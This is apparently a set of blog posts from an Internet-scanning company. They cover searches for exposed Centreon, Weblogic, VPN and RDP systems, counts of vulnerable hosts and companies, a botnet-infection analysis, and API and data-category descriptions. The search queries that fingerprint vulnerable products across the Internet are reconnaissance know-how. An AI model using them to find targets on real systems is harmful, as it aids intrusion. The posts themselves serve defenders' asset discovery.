Identifying your Internet exposed Centreon monitoring software

As cybercriminals are exploiting weaknesses in Centreon monitoring software and our customers may be at risk, we thought it would be a good idea to give some details on how to detect this software Internet exposure using our data. Let’s dive into different options for doing so.

Identifying Centreon patterns using the data field

The data field is a full-text search field. That means you can search using words or phrases within raw data responses from our application probes. This field is available in most of our different categories of information (see standard information categories and entreprise information categories). For this post, we will focus on the datascan category.

Centreon software has different patterns we can use to accurately identify it. We can use 2 different patterns for doing so:

category:datascan data:"<img src=\"img/centreon.png\" alt=\"Centreon Logo\" title=\"Centreon Logo\" />"
category:datascan data:"<a href=\"mailto:contact@centreon.com\">Centreon</a>"

If you use this query with our beta Web site, you will have such a result:

 

With this pattern, we identify 570 exposed devices. Using the second pattern, we identify 400 devices.

Another way is using app.http.title field

The app.http.title field is also a full-text search field. But we can use it to match against a complete phrase if we want to. This is the data you get in the title HTML tag:

category:datascan app.http.title:"Centreon - IT & Network Monitoring"

This time, we identify 601 devices. But as we have analyzed our data, we know that the “Centreon” string may differ as it may be customized. So let’s rewrite our search using less words like this:

category:datascan app.http.title:"IT & Network Monitoring"

612 devices are now found.

Using an OR query to combine them all

Now, that would be great to perform an OR query. It is, in fact, a new feature of our language currently in beta and only available on https://beta.onyphe.io. This is part of our advanced query language functions available to Lion View” and “Eagle View (unlimited)” subscriptions. The OR query is usable by preceding the wanted field by a question mark (? character).

The new language performs a search against datascan category by default, so you can skip the category:datascan part:

?app.http.title:"Centreon - IT & Network Monitoring" ?data:"<a href=\"mailto:contact@centreon.com\">Centreon</a>" ?data:"<img src=\"img/centreon.png\" alt=\"Centreon Logo\" title=\"Centreon Logo\" />"

Which gives us 623 results.

 

But there are more ways of finding them

Maybe these patterns are not enough as the patterns were not available at the time of scanning, for instance. So we can search against 2 more fields: url and host.

A standard way of exposing a software on a Web site is to give it a base URL with the name of the software you want to give access to. By using a wildcard query against the url field, you can find potentially more exposed devices:

-wildcard:url,*centreon*

More than 1,400 devices exposed.

When we perform DNS resolutions (forward and reverse), we split the fields into different other fields to make it easy to search using them. These fields are not subject to full-text searches, we can only use them in wildcard queries or exact match queries.

When we take a fully-qualified domain name (FQDN), we split it into the following new fields:

  • host: the hostname part
  • domain: the domain name
  • subdomains: one or more subdomains
  • tld: the top-level domain

Another standard practice is to name a computer based on its usage. For Centreon software, we could find exposed devices by using a host:centreon filter:

This yields us 2,276 devices.

Of course, you can combine all these filters and adding an orwildcard function to also match optionally against URLs:

?host:centreon -orwildcard:url,*centreon* ?app.http.title:"IT & Network Monitoring" ?data:"<a href=\"mailto:contact@centreon.com\">Centreon</a>" ?data:"<img src=\"img/centreon.png\" alt=\"Centreon Logo\" title=\"Centreon Logo\" />"

We have a grand final result of 3,653 exposed devices.

Identification of assets made even easier

Of course, as data patterns are now identified, we have added them to our identification patterns to make it easier to search for next times. That is, we have added the Centreon product to assets we identify using others specific fields: device.class and app.http.component.product.

We believe asset categorization is a must have on any Internet exposed devices scanner and we use the device.class field for doing so. Knowing you have “VPN Server” or “Monitoring” device classes exposed is something you should really pay attention to.

device.class:Monitoring app.http.component.product:Centreon

Conclusion

As we have seen, we have accurate data and many specific fields to make it easy for you to find your Internet exposed devices. We hope you won’t be the next to fall for an unpatched system. Subscribe to one of our offers and quickly dive into your exposed devices.

1,100 Oracle Weblogic servers vulnerable to CVE-2020-14882 can be easily compromised

Back in August 2020, we alerted that many global500 or fortune500 companies could be easily compromised by exploitation of known trivial vulnerabilities.

Now, we added a new check to our vulnscan category of information about an unauthenticated remote code execution on Oracle Weblogic servers. This vulnerability is named CVE-2020-14882. Here follows our test results.

 

  1. Searching for potentially vulnerable systems

The first thing we have to do before checking for vulnerable systems is to find potentially vulnerable systems. Fortunately, there is a specific filter to use to query ONYPHE in order to fetch this list:

category:datascan app.http.component.product:”Weblogic server” app.http.component.productvendor:”Oracle”

We found more than 14,000 exposed devices. But being exposed does not mean being exploitable. As we have developed our own non-intrusive check, we are able to verify in an innocuous way if they are vulnerable or not. Our checker just fetches Operating System and its version. Thus, we also have details about which kind of systems are used to host Weblogic servers.

As we don’t want to help cybercriminals and as there is already enough proof-of-concept codes available out there, we are not going to release our checker.

2. Count of vulnerable systems

By using a simple filter on our vulnscan category of information, we are able to know how many unique IP addresses are vulnerable, or how many unique domains and the count of unique fortune500/global500 companies. The filter is simply “cve:CVE-2020-14882“:

category:vulnscan cve:CVE-2020-14882

Beware, 2,000 is a misleading number as it does not return unique IP addresses result. Here are some screenshots from our back-end that allows to access the good numbers:

3. Operating System used to host Oracle Weblogic servers

As we fetch Operating System (OS) and their version information and set a specific field in our data, we are able to perform statistics based on these values:

top used operating systems

Linux is the most used OS with 76.2% followed by Windows Server 2012 R2 with 11.1% and Windows Server 2016 with 8.4%. Interestingly, we also find SunOS and AIX OSes, even though they are not wildly used at all.

4. Conclusion

More than 1,100 unique IP addresses are impacted, accounting for 231 unique domains and at least 5 unique big companies.

This check will be executed every week from now on, so we will have updated information available for our Eagle View customers.

Patches are available, so apply them as quickly as possible as this vulnerability may end up in the next NSA’s TOP25 most exploited vulnerabilities by cybercriminals.

Many global500 and fortune500 companies still vulnerable to known critical vulnerabilities

Since a few months now, cyber criminals are targeting vulnerabilities in VPN appliances from major brands to compromise and deploy ransomware on affected companies.

As we spoke about in a previous blog post, we are checking those vulnerabilities at Internet scale to help our customers find and fix their assets before the bad guys exploit them, eventually costing millions to recover.

In this blog post, we will introduce our new tagging capability which allows us the find all vulnerable global500 and fortune500 companies in a matter of an API query.

 

  1. Vulnerabilities we are able to detect

Today, we are checking 7 critical vulnerabilities. These vulnerabilities are exploitable remotely from the network with no user interaction and without any authentication required. They allow to perform remote code execution on affected targets and that is why cyber crooks love them.

Here is the list of CVE we are checking for:

Proportion of impacted devices by CVE

 

2. Introducing the fortune500 and global500 tags

Since August 22nd, we added lookup capabilities to our scanning engine. We have built a comprehensive inventory of fortune500 and global500 companies. Each time we receive an application response with a domain name set (example: adobe.com), we add tags when a match is found.

Searching using tag:global500 filter within category:vulnscan
Tag cloud for vulnerable companies

As you can see from the tag cloud, the most prevalent vulnerability found on big companies is the one impacting Cisco ASA (CVE-2020-3452). But what is worrying to us is the fact that some companies still have critical vulnerabilities on their Citrix Gateway, FortiNet FortiGate, SAP Netweaver Application Server or PulseSecure Pulse Connect Secure devices.

Also, you may note that no company is impacted by the #ghostcat or F5 Networks BIGIP vulnerabilities.

3. How many of these companies are impacted?

To count how many of them are vulnerable is not a direct and unique query. We can count either on the number of unique IP addresses or on the number of unique domains. However, a company can have multiple domains. According to our datasets, a correct guess is around 2 domains per company.

Furthermore, a company can use multiple device brands and thus may be counted multiple times when you do the math by counting on the below figures. So, from the following figures, simply divide by 2 to have an estimated guess of how many fortune500 and global500 companies are impacted for each vulnerability.

 

3.1. Cisco ASA devices

Around 180 companies impacted

3.2. SAP Netweaver Application Server

Around 30 companies impacted

3.3. Citrix Gateway

Around 8 companies impacted

3.4. PulseSecure Pulse Connect Secure

Around 3 companies impacted

3.5. Fortinet FortiGate

Only 1 company impacted

As our data shows, around 200 of the biggest companies are still impacted by critical known vulnerabilities with patches available. When you remove duplicates between fortune500 and global500, there is a total of 881 companies.

In the end, it is more than 20% of big companies which have known critical vulnerabilities, that is more than 1 company out of 5.

 

4. How to verify you are not impacted

Customers having an “Eagle View” subscription can check by themselves. This is the only subscription-level that allows querying the vulnscan category of information. Other Entreprise-level subscriptions do not give access to such data.

To avoid our online payment service to be exploited by malicious actors to fetch this sensitive information, we only sell Eagle Views after proper human interaction and validation that a true legitimate company lies behind the subscription request.

To check you are not vulnerable is as easy as running an API query against the current week if executed on Thursdays (scans are launched every Wednesdays) or querying against the previous week when executed on Mondays:

category:vulnscan -exists:cve domain:onyphe.io -weekago:0

Of course, you can also use the Alert API or script your queries using the Search API.

Conclusion

These vulnerabilities are massively exploited on the Internet. You don’t want to be the next big company falling for an unpatched VPN endpoint, losing millions, and losing your CEO job too. Contact us at sales[at]onyphe dot io for a demo.

Coronavirus pandemic – hospitals are targets for cyber criminals

Source: https://www.youtube.com/watch?v=8GsLEmZTgFo 

At ONYPHE, we are very concerned about cyber-criminals taking advantage of the current worldwide coronavirus crisis. At our scale, we want to give a hand to hospitals by giving them free information about vulnerabilities we have discovered on their Internet borders. We are willing to share this data with hospitals or any state agency that could deliver information to them. In fact, we already provided some data to a few of them. But it is far from enough in regards to our results.

We already know many hospitals were compromised, before the crisis or even now. Specific critical vulnerabilities were exploited and ransomware were deployed to extort those hospitals. We are checking those vulnerabilities too. Hospitals are already under pressure because they are (or will be) overwhelmed by sick people that need medication and care, they don’t need a cyber-security crisis added on top.

This blog post describes what we check, how we check, and which kind of information we currently have. We also describe what we need to cooperate with hospitals and state agencies. But make no mistake, cyber-criminals probably already have the same information at their disposal, so we must take quick action.

Critical vulnerabilities we are currently checking

This week, we worked on writing checking codes in order to detect, in a non-intrusive manner, critical vulnerabilities we know are exploited against hospitals worldwide. Those vulnerabilities are exploited to deploy ransomware. They may have names (or not), but in all cases, they are intrusive and you must fix them as soon as possible. Here is our current list:

We currently have 74,166 unique IP addresses vulnerable to one of these 4 critical vulnerabilities. Fortunately, they are not all hospitals.

Around 63% are about CVE-2020-1938, 20% about CVE-2018-13379, 14% about CVE-2019-19781 and finally 3% for CVE-2019-11510.

How do we check these vulnerabilities?

Exploit codes are available for all these critical vulnerabilities. We developed our own checking methodology based on that information. We verify the existence (or lack thereof) of these vulnerabilities by connecting to an innocuous URL and verifying the response. We are not relying solely on versions discovered by banner grabbing for these specific vulnerabilities.

What do we need from hospitals or state agencies?

If you are a hospital or a state agency in search for vulnerable hospitals in your country, we are willing to give you free information on impacted devices. To do so, what we need from you is the list of domain names or host names for your country’s hospitals. With this list, we are able to correlate with our vulnscan data to extract the needed information.

For instance, we did that for hospitals in some countries. We were provided a CSV file with a list of domain names. We won’t communicate any result or numbers because we don’t want to help cyber-criminals. We communicated our results to some state agencies and hospitals (we won’t communicate their name either). We hate saying that, but trust us, we have to take action.

How do we correlate data?

We feed our tool with a CSV file as input. Each line is the domain name or host name of an hospital. For instance:

cat hospital-domains.csv
domain
hospital1.com
hospital2.com

Then we simply launch our tool (publicy available, but you require an Eagle View subscription for querying) as the following to get full JSON information as output (example JSON output can be found in this blog post):

onyphe -export 'category:vulnscan -exists:cve -weekago:0 | whitelist hospital-domains.csv'

This query scrolls every information we have in vulnscan category of information with an existing CVE field for the current week results. Each week, we scan for described vulnerabilities on a list of potentially vulnerable devices we build by continuously scouting the Internet and applying pattern matching to identify devices and known brands.

For instance, we are able to list all Fortinet FortiGate products connected on the Internet by entering the following query:

category:datascan device.productvendor:Fortinet device.product:FortiGate

Note: this request requires en Entreprise subscription.

During the execution of this scrolled query, we apply the white listing by using values taken from the CSV file and comparing against each result we found. For each line in the CSV, the tool checks if the vulnerable entry has a field named “domain” and a corresponding value in the file.

Conclusion

We are willing to help. We do monitor the Internet to discover vulnerabilities and weaknesses so our customers can act before cyber-criminals exploit them.

We want to share freely this information with hospitals and state agencies worldwide. You may contact us by sending an email at contact at onyphe dot com so we can help you.

Analyzing Mirai-FBot infected devices found by MalwareMustDie

Following a blog post from MalwareMustDie (MMD) and some tweets related to an increase in Mirai-FBot detections, we decided to demonstrate the power of our new Bulk Summary API using data published on pastebin.

UPDATE-20200305: a new list of infected devices has been put online by MMD so we have updated the JSON file from Bulk queries against 1429 unique IP addresses resulting in around 17,000 entries from our data.

Get IP list of infected hosts from MMD’s pastebin

By using standard command line tools, we can fetch the list of IPs made freely available by MMD on their pastebin:

curl -XGET 'https://pastebin.com/raw/8n9G964c' |grep -v "Infected IP of the New FBot" | dos2unix > /tmp/fbot.txt

# How many results do we have?
wc -l /tmp/fbot.txt
582

Execute Bulk Summary API request for each IP address

Now that we have a list in the correct format (1 IP address per line), we can query using the Bulk Summary API to fetch last 10 entries we have for each category of information for every IP address in this list.

The goal will be to load that data into a local Elasticsearch database and perform some analytics to learn which kind of device is actually compromised.

curl -XPOST -H 'Authorization: apikey YOUR_API_KEY' -H 'Content-Type: application/json' --data-binary @/tmp/fbot.txt 'https://www.onyphe.io/api/v2/bulk/summary/ip' > /tmp/fbot.json

# How many results do we have?
wc -l /tmp/fbot.json
8227

Loading the data into Elasticsearch

You will have to install Elasticsearch and Kibana. You can follow our training guide you can find on GitHub to easily install them. Or if you are lazy enough to not click and follow our guide, here is how to do it:

wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.6.0-linux-x86_64.tar.gz 
wget https://artifacts.elastic.co/downloads/kibana/kibana-7.6.0-linux-x86_64.tar.gz 
wget https://artifacts.elastic.co/downloads/logstash/logstash-7.6.0.tar.gz
tar zxvf elasticsearch-7.6.0-linux-x86_64.tar.gz 
./elasticsearch-7.6.0/bin/elasticsearch
tar zxvf kibana-7.6.0-linux-x86_64.tar.gz
./kibana-7.6.0-linux-x86_64/bin/kibana
tar zxvf logstash-7.6.0.tar.gz

Once they are installed, you can load JSON data by using Logstash. Just create the configuration file named load.conf as follows:

# We use plain codec then json filter to avoid json code adding its host field
# as we are using host field in ONYPHE data.
input {
  stdin {
    codec => plain { charset => "UTF-8" }
  }
}

filter {
  json {
    source => "message" 
  }
  mutate {
    remove_field => [ "message" ] 
  }
}

output {
  elasticsearch {
    hosts => [ "http://localhost:9200" ]
    index => "fbot"
  }
}

And you can load the data:

cat /tmp/fbot.json | ./logstash-7.6.0/bin/logstash -f load.conf

Preparing Kibana

Before you can play with the data you just loaded, you have to create the Kibana index pattern. First, launch your Web browser and connect to http://localhost:5601/ then follow these steps:

Click on “settings” application at the bottom of left menu (application menu):

Click on “Index Patterns” menu:

Click on “Create index pattern”:

Enter “fbot” as the pattern name and click “Next step”:

Select “@timestamp” as the timestamp field and click on “Create index pattern”. You’re set.

 

Ready to analyze

One of the first question one may ask is: which kind of device is compromised? We have all heard about Internet of Things (IoT), but is it the case for this botnet?

Let’s first search with the device.class filter in datascan category of information. We will create a wonderful Pie Chart visualization with the top 10 device.class. To make it better for our demonstration, we will put appart the generic devices (like Web Server, Telnet Server and all other kind of servers).

To do so, create a Pie Chart like this:

Click on “Visualize” application in the application menu:

Then click on “Create new visualization”:

Chose “fbot” index as the source. Select the last 30 days timerange, as our Bulk export covers that timerange (actually, range is between 2nd of february and 2nd of march). And write the following filter:

@category:datascan AND NOT device.class:*Server

Now, we want the top 10 device classes. So click “Add” to create buckets based on different values of device.class field:

Chose the “Terms” aggregation and the device.class.keyword field. Also set to 5 the size of your top visualization:

To refine things, also chose to display “Unique Count” of ip.keyword field:

Click the “Play” button, and you should have the wonderful following Pie Chart:

 

 

And the top 5 infected IoT devices are:

  • Android (~ 53%)
  • TV Box (~ 18%)
  • Camera (~17%)
  • Router (~11%)
  • NAS (~1%)

Conclusion

As you have seen, it is easy to analyze data using Elasticsearch+Kibana and our brand new Bulk Summary API. Of course, we have other wonderful APIs as documented on our Web site.

Another question could be: how those devices were infected? And we are sur you have many other questions. Furthermore, as you have seen, we just analyzed the value of one field within the datascan category of information. What can be found in other categories of information?

As we love our community, we decided to release for free the data we spoke about in this blog post. Download it, play with it, and let us know about your findings ūüôā

Newsletter 2020#1 – APIv2, new pricing and new Web search features

Dear customers and free users,

it is with great pleasure that we announce the general availability of APIv2, a new pricing and new Web search features allowing better and easier navigation with just a mouse click to go deeper into data we collect.

1. APIv2 main changes

We have reviewed completely our APIs. We updated older APIs to make them easier to understand and added many more APIs which are now split into different categories as follows:

  • Simple API
  • Summary API
  • Alert API
  • Bulk API
  • Export API

Simple and Summary APIs are available starting from Free View. Alert API is available starting from Dragonfly View, and Bulk and Export starting from Entreprise Views.

Be aware that Summary APIs are querying multiple categories of information. From now on, using these APIs may cost more than just 1 credit as they may return up to 100 results (so they may consume up to 10 credits). Other APIs continue to consume only 1 credit. But wait, we have changed our pricing for the better as you will see.

For the most complete API (the Search API), just pass in a query string using the OQL (ONYPHE Query Language) and you simply get your results. Search API is available starting from Dragonfly View. For instance, to search within new information category vulnscan (vulnscan category available only starting from Eagle View):

https://www.onyphe.io/api/v2/search/category:vulnscan%20cve:CVE-2019-19871?k=YOUR_API_KEY

This is the exact same syntax as in the Web search engine, so you now just have to copy/paste your Web query into your API query.

The Bulk API allows to execute Summary queries on a batch of IP, domain or hostname. It returns results in raw JSON format. More on that in a next post.

The Export API allows to execute a Search query and return all results in a streaming manner in raw JSON format. Again, more on that in a next post.

Documentation is not ready yet on how to use those APIs, but it will come very soon. We will update you as soon as it is available. In the meantime, APIv1 is still available and will continue for a few more months. We speak about important dates at the end of this newsletter.

2. New categories of information

 

  • topsite: information about top hostnames and domains, those generating the most trafic on the Internet. Information is taken from Alexa TOP-1M, Cisco Umbrella and Majestic Million. As usual, data is updated once a month.
  • vulnscan: beginning of the year, we started scanning for most critical vulnerabilities on identified assets thanks to our identification engine. For instance, we are able to list all Citrix Gateways available on the Internet, thus we launched some vulnerability scans against #Shitrix #CVE-2019-19781. As this data is very sensitive, only customers with Eagle View subscription can access its content. We will add more specific vulnerability checks in the future.

Topsite category is available to all Entrerprise Views and vulnscan category to Eagle Views.

3. New pricing and rate limiting

But we have more cool news for you, dear customers and users. We have reviewed our pricing and decided to give you more query credits by a factor of 10. Yes, 10 times more credits to use for every View. Even better for Eagle View subscriptions: there is no more limits, you have unlimited credits. Along with increasing the number of credits, we now allow to perform 30 requests per minute instead of 20 requests previously.

Along with this new pricing, Eagle View subscriptions will have access to the new vulnscan category of information, on-demand scans,  Export API and premium support. Still not convinced? Try our service with the Dragonfly View. Only 59 Euros one-shot with perpetual validity, and up to 10,000 results per month.

Regarding the calendar, here are important dates:

  • 2020-03-01: deployment of APIv2, new pricing and new Web frontend. APIv2 becomes the default for Web queries;
  • 2020-04-01: APIv2 becomes the default for API queries;
  • 2020-07-01: removal of legacy APIv1 endpoints.

For any question, contact sales(at)onyphe(dot)com.

Best regards,

Open-source projects with ONYPHE integration

In this blogpost, we provide a mostly complete list of open-source projects or libraries that enable you to integrate our data directly within your daily tasks.

Libraries

Open-source projects

Browser plugins

SIEM

Find your exposed Microsoft RDP services

CVE-2019-0708 exploits an unauthenticated remote code execution vulnerability in Microsoft RDP service. As the patch is out, you should apply it as quickly as possible before bad guys start to exploit it.

But what if you don’t know where are your servers to patch?

Most companies have hard time locating and keeping an inventory of all their assets. Especially those exposed on the Internet. Another cause is the explosion of shadow IT or shadow cloud. In this blog post, we will describe how to locate them by querying our data.

Identify your network blocks

If you are a mature company, you probably already have a list of all your subnets (being your own datacenters or some possibly outsourced). That’s great. But what if you don’t?

You could use our inetnum category of data to first build your list of subnets you will be able to use afterwards to search for open RDP services. The subnet field is the way to go for such a use case. Another possibility, if you are a big company, is to get the list of your own AS numbers by listing asn field values.

Some requests you can enter in our search engine (or via our API) to achieve this goal:

category:inetnum netname:"your netname"
category:inetnum organization:"your organization"
category:inetnum domain:your_domain.com
category:inetnum asn:ASyour_number
category:inetnum ip:some_of_your_ips

Note: search filters are only available when you have access to the Search API. These APIs are available starting from “Dragonfly View” [1].

As a customer of our solution, you could also use the new (currently BETA) function called -wildcard:

category:inetnum -wildcard:netname,*your_organization*
category:inetnum -wildcard:organization,*your_organization*

What will most interest you is the value of the field subnet. By listing all of them, you will be able to go to the next step to find open RDP services.

Note: search functions are only available for “Entreprise Views” [1]. The -wildcard function searches only on the previous day of results by default. To search from older times, use the -dayago function like: -dayago:4 to search 4 days ago.

Sample result for inetnum category:

Search by using the synscan category of information

While performing SYN scans over the full IPv4 address space, we also perform reliable remote Operating System (OS) identification. You may base your following searches on such data to identify open ports 3389/tcp with Windows OS running on your subnets as identified during the previous step.

category:synscan ip:93.184.216.0/24 os:Windows port:3389
category:synscan asn:ASyour_number os:Windows port:3389
category:synscan organization:"your organization" os:Windows port:3389

Note: the CIDR search (like the Search API, which allows the use of these search filters) is available only starting from the “Dragonfly View” as described at [1].

Note2: values are case sensitive in all searches, so be sure to write Windows with a capital W and not windows. That would yeld no result.

Sample result for synscan category:

Search by using the datascan category of information

The previous method will eventually return matches, but the best way is to leverage the datascan category. synscan entries don’t have information about the application layer, while datascan entries do. In fact, we are identifying the application layer protocol and you can perform searches directly using the protocol field:

category:datascan protocol:rdp ip:93.184.216.0/24 os:Windows
category:datascan protocol:rdp asn:ASyour_number os:Windows
category:datascan protocol:rdp organization:"your organization" os:Windows

Note: we may have some results for RDP services not listening on usual port 3389/tcp thanks to that protocol identification.

Now that you have a complete list of all your subnets and AS numbers, you can refine the search to discover your Internet exposed assets.

Search using DNS resolution enrichments within the datascan category of information

As we perform numerous DNS resolutions to enrich our data, you may also search your exposed assets by querying related fields like:

  • domain: the domain name with only one “.” character;
  • subdomains: one of your subdomains, those with multiple “.” characters;
  • hostname: the fully qualified domain name;
  • reverse: or use the reverse fully qualified domain name.
category:datascan protocol:rdp domain:your_domain.com
category:datascan protocol:rdp subdomains:sub.your_domain.com
category:datascan protocol:rdp hostname:www.sub.your_domain.com
category:datascan protocol:rdp reverse:ptr.your_domain.com

Sample result:

The admin tag

And if you want to put such kind of surveillance into practice, you may also directly use tag:admin filter. It will match for any remote admin protocols used to perform administrative tasks like RDP, SSH or telnet (list not complete).

And sometimes, administrative interfaces are vulnerable to some CVEs…

Sample result:

Conclusion

As the CVE-2019-0708 is claimed to be wormable, we urge our customers to perform described searches. If you are not yet a customer, take a look at our pricing page [1] and don’t hesitate to contact us at sales[at]onyphe.io for any enquiry.

[1] https://www.onyphe.io/pricing/

Entreprise information categories

Entreprise information categories are the ones only accessible to Entreprise View customers. Of course, these customers will also have access to standard information categories.

The following categories are defined as entreprise:

  • onionscan
  • onionshot
  • datashot
  • topsite
  • vulnscan

Entreprise information categories description

Each collected information is enriched with a timestamp and geolocation information (where applicable).

onionscan category

As well as crawling the clear Net and the clear Web with the datascan information category, we are also crawling the Dark Web (also known as the onion land). As of today, we are only crawling using the HTTP protocol.

{
  "count": 2,
  "error": 0,
  "max_page": 1,
  "myip": "<redacted>",
  "page": 1,
  "results": [
    {
      "@category": "onionscan",
      "@timestamp": "2018-10-24T19:03:31.000Z",
      "@type": "doc",
      "app": {
        "extract": {
          "domain": [
            "wikipedia.org",
            "wikibooks.org",
            "haskell.org",
            "ats-lang.org"
          ],
          "file": [
            "grdt-popl03.pdf"
          ],
          "hostname": [
            "en.wikibooks.org",
            "en.wikipedia.org",
            "wiki.haskell.org",
            "www.ats-lang.org"
          ],
          "url": [
            "http://www.ats-lang.org/MYDATA/GRDT-popl03.pdf",
            "http://www.ats-lang.org/",
            "https://en.wikibooks.org/wiki/Haskell/GADT",
            "https://wiki.haskell.org/GADTs_for_dummies",
            "https://en.wikipedia.org/wiki/Generalized_algebraic_data_type"
          ]
        },
        "http": {
          "bodymd5": "d41d8cd98f00b204e9800998ecf8427e",
          "headermd5": "297ee2062d5eab6d7a30bd8656730536",
          "title": "Bluish Coder"
        },
        "length": "4096"
      },
      "cpe": [
        "cpe:/a:igor_sysoev:nginx:1.10.3"
      ],
      "data": "HTTP/1.1 200 OK\r\nContent-Length: 93915\r\nETag: \"5bc71236-16edb\"\r\nDate: Wed, 24 Oct 2018 19:03:31 GMT\r\nLast-Modified: Wed, 17 Oct 2018 10:43:02 GMT\r\nServer: nginx/1.10.3 (Ubuntu)\r\nContent-Type: text/html\r\nAccept-Ranges: bytes\r\nConnection: keep-alive\r\n\r\n\n<!DOCTYPE html>\n<html>\n<head>\n   <meta http-equiv=\"content-type\" content=\"text/html; cha
[..]
      "datamd5": "6f50408650910af16c5f8b229202264e",
      "device": {
        "class": "Web Server"
      },
      "domain": "mh7mkfvezts5j6yu.onion",
      "hostname": "mh7mkfvezts5j6yu.onion",
      "onion": "mh7mkfvezts5j6yu.onion",
      "os": "Linux",
      "osdistribution": "Ubuntu",
      "port": 80,
      "product": "Nginx",
      "productvendor": "Igor Sysoev",
      "productversion": "1.10.3",
      "protocol": "http",
      "protocolversion": "1.1",
      "reason": "OK",
      "seen_date": "2018-10-24",
      "source": "datascan",
      "status": "200",
      "tag": [
        "ok"
      ],
      "tls": "false",
      "url": "/"
    },
[..]
  ],
  "status": "ok",
  "took": "0.004",
  "total": 2
}

onionshot category

As we crawl the Dark Web, we also perform screenshot activities against all onion Web sites. This category of information stores screenshots that have been taken.

{
  "count": 2,
  "error": 0,
  "max_page": 1,
  "myip": "<redacted>",
  "page": 1,
  "results": [
    {
      "@category": "onionshot",
      "@timestamp": "2019-05-07T15:49:37.000Z",
      "@type": "doc",
      "app": {
        "http": {
          "bodymd5": "d41d8cd98f00b204e9800998ecf8427e",
          "headermd5": "1d4ac9665b20bd9523d1d398e3afb4e6"
        },
        "length": "177",
        "screenshot": {
          "format": "jpg",
          "image": "/9j/4AAQSkZJRgABAQEAZABkAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARC
[..]
          "imagemd5": "de9c6f35276f5fbd045c0f6ef27d7ba3"
        }
      },
      "data": "QStandardPaths: XDG_RUNTIME_DIR not set, defaulting to '/tmp/runtime-root'\nlibpng warning: iCCP: known incorrect sRGB profile\nlibpng warning: iCCP: known incorrect sRGB profile\n",
      "datamd5": "1d4ac9665b20bd9523d1d398e3afb4e6",
      "device": {
        "class": "Web Server"
      },
      "domain": "b2ebtnyz25tr4nxl.onion",
      "forward": "b2ebtnyz25tr4nxl.onion",
      "hostname": "b2ebtnyz25tr4nxl.onion",
      "onion": "b2ebtnyz25tr4nxl.onion",
      "port": 80,
      "protocol": "http",
      "seen_date": "2019-05-07",
      "source": "onionscan",
      "tls": "false",
      "transport": "tcp",
      "url": "/"
    },
[..]
  ],
  "status": "ok",
  "took": "0.184",
  "total": 2
}

datashot category

Some protocols allows to have a graphical view on an interface. So we perform screenshots against the following protocols:

  • x11
  • vnc
  • rdp
  • rtsp
{
  "count": 10,
  "error": 0,
  "max_page": 456,
  "myip": "<redacted>",
  "page": 1,
  "results": [
    {
      "@category": "datashot",
      "@timestamp": "2019-05-08T04:32:30.000Z",
      "@type": "doc",
      "app": {
        "length": "599",
        "screenshot": {
          "format": "jpg",
          "image": "/9j/7gAOQWRvYmUAZAAAAAAA/9sAQwABAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEB/8AAEQgBkALQA1IRAEcRAEIRAP/EAB8AAAEFAQEBAQEBAAAAAAAAAAABAgMEBQYHCAkKC//EALUQAAIBAwMCBAMFBQQEAAABfQECA
[..]
          "imagemd5": "2c685c23737b6c9d8c0975599088a991"
        },
        "vnc": {
          "authentication": "null",
          "desktopname": "QEMU (opnsense)",
          "screensize": "720x400",
          "version": "3.8"
        }
      },
      "asn": "AS32613",
      "city": "Montreal",
      "country": "CA",
      "data": "VNC server supports protocol version 3.8 (viewer 3.3)\nNo authentication needed\nDesktop name \"QEMU (opnsense)\"\nConnected to VNC server, using protocol version 3.3\nVNC server default format:\n  32 bits per pixel.\n  Least significant byte first in each pixel.\n  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0\n  32 bits per pixel.\n  Least significant byte first in each pixel.\n  True colour: max red 255 green 255 blue 255, shift red 0 green 8 blue 16",
      "datamd5": "524ba7c9686dcc17075c5c3260be070f",
      "device": {
        "class": "VNC Server"
      },
      "ip": "<redacted>",
      "ipv6": "false",
      "location": "45.4594,-73.5501",
      "organization": "iWeb Technologies Inc.",
      "port": "5901",
      "protocol": "vnc",
      "seen_date": "2019-05-08",
      "source": "datascan",
      "subnet": "<redacted>/22",
      "tag": [
        "admin"
      ],
      "tls": "false",
      "transport": "tcp"
    },
[..]
  ],
  "status": "ok",
  "took": "0.205",
  "total": 4557
}

topsite category

Alexa top 1-million, Cisco Umbrella or Majestic are 3 source of information when speaking about most surfed domains or hostnames. We collect all of them and perform mass DNS requests to fill resolver category and topsite category of information. Of course, we perform both IPv4 and IPv6 DNS queries.

{
  "count": 10,
  "error": 0,
  "max_page": 67,
  "myip": "<redacted>",
  "page": 1,
  "results": [
    {
      "@category": "topsite",
      "@timestamp": "2020-03-04T06:32:14.000Z",
      "asn": "AS13335",
      "country": "US",
      "domain": "leparking-moto.fr",
      "forward": "cloud.leparking-moto.fr",
      "host": "cloud",
      "hostname": "cloud.leparking-moto.fr",
      "ip": "2606:4700:3034:0:0:0:6812:2d86",
      "ipv6": "true",
      "latitude": "37.7510",
      "location": "37.7510,-97.8220",
      "longitude": "-97.8220",
      "organization": "CLOUDFLARENET",
      "seen_date": "2020-03-04",
      "source": "umbrella",
      "subnet": "2606:4700::/32",
      "tag": [
         "top1m",
         "umbrella"
      ],
      "tld": "fr"
    },
[..]
  ],
  "status": "ok",
  "text": "Success",
  "took": 0.051,
  "total": 665
}

vulnscan category

Something new in 2020, we are scanning for specific vulnerabilities. Those ranked highly critical that should be patched yesterday and are used on top products. For instance, the #Shitrix #CVE-2019-19871 impacting Citrix Gateways. Data is exactly the same as one can find in datascan category of information, but vulnscan category is only available to Eagle View customers.

Other information categories

But we collect more information categories as described in this post.

Standard information categories

Standard information categories are the ones any Plan user has access to. That is, even unregistered Web or registered Free Plan users have access to this kind of information. Of course, registered Free Plan users have other benefits as described on our pricing page.

The following categories are defined as standard:

  • inetnum
  • synscan
  • datascan
  • pastries
  • resolver
  • threatlist
  • geoloc
  • sniffer
  • ctl

Note: having access to a category doesn’t necessarily means that you have access to every fields (or filters) of an entry. There is also the concept of standard filters and advanced filters.

Standard information categories description

